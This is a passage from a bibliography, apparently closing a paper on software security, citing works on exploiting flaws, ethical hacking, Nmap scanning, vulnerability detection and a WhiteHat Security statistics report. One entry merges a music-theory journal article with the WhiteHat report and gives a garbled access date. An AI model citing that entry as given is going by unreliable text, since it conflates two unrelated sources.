Exploiting Security Flaws. Indianapolis, IN: Wiley, 2011. Print.

DeFino, Steven. Official Certified Ethical Hacker Review Guide. Boston, MA: Course

Technology, Cengage Learning, 2010. Print.

Lyon, Gordon Fyodor. Nmap Network Scanning: Official Nmap Project Guide to Network

Discovery and Security Scanning. Sunnyvale, CA: Insecure.Com, LLC, 2008. Print.

Chen, S., J. Xu, Z. Kalbarczyk, and K. Iyer. "Security Vulnerabilities: From Analysis to

Detection and Masking Techniques." Proceedings of the IEEE 94.2 (2006): 407-18.

Microsoft Research. Microsoft, Feb. 2006. Web. 5 Oct. 2014.

< http://research.microsoft.com/en-us/um/people/shuochen/papers/ieee-proc.pdf>.

Kane, Brian. "INTRODUCTION." Journal of Music Theory 54.1, CAVELL'S "MUSIC

DISCOMPOSED" AT 40 (2010): 1-4. WhiteHat Security. WhiteHat Security, May 2013.

10/1 Oct. 2014. <https://www.whitehatsec.com/assets/WPstatsReport_052013.pdf>.

34

Appendix